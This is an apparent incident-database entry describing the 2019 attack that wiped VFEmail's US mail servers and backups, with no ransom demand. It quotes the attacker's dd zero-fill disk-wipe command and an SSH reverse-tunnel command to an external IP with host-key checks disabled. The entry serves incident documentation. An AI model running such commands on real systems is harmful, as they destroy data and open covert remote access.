
Cyber Incident Victim: VFEmail

Date: Feb 2019

Location: United States of America

Summary

Hackers breached a privacy-focused email provider's US servers and carried out a purely destructive attack that wiped all data on primary and backup systems across multiple data centers. Using SSH access, the attackers formatted the disks with zero-fill commands, destroying every virtual machine even though the VMs used different authentication. No ransom demand was made, which distinguishes the incident from typical ransomware cases. The catastrophic data loss, including custom code, led the owner to consider permanent shutdown, citing past financial struggles and the inability to rebuild critical systems.


Description

On February 11, 2019, VFEmail, a privacy-focused email service provider, experienced a catastrophic cyberattack targeting its U.S. infrastructure. The attackers compromised all externally facing systems across multiple data centers, even though those systems ran different operating systems and used separate remote authentication mechanisms. VFEmail detected the intrusion when its systems became unresponsive, and forensic analysis then identified the unauthorized activity. The attackers were caught in the act of formatting the backup server with the command `dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559`, logged in over SSH from IP address 94.155.49.9 using a reverse port-forward with host-key verification disabled (`ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null [email protected] -R 127.0.0.1:30081:127.0.0.1:22 -N`; the `-R` option forwards port 30081 on the remote host back to port 22 on the originating host). Within two hours, the attackers had formatted every disk on every server, including primary and backup systems, destroying all virtual machines (VMs). Notably, the VMs did not share authentication credentials, which indicates the attack involved more than simple reuse of a stolen SSH login. The attackers left no ransom note or extortion demand, which distinguishes this incident from typical ransomware or DDoS extortion campaigns.


The attack resulted in irreversible data loss for VFEmail's U.S. mail services, affecting both active mailboxes and backup repositories. VFEmail immediately warned users via its website and Twitter not to reconnect their email clients, so that a sync would not overwrite locally stored messages. The service's owner, identified as Havokmon, stated that the scale of the destruction made recovery impractical, citing the loss of custom code and the service's historical lack of profitability as barriers to rebuilding. Prior incidents included DDoS attacks in 2015 and 2018 that disrupted operations, as well as blocked web server intrusion attempts in November 2018. Havokmon acknowledged possible motives, including use of the service by hackers, political dissidents, or other high-risk groups, but confirmed that no specific threats preceded the February 2019 attack. The incident marked one of the first documented cases of a purely destructive attack against an email provider with no financial or ideological demands disclosed, leading to the likely permanent termination of VFEmail's operations.
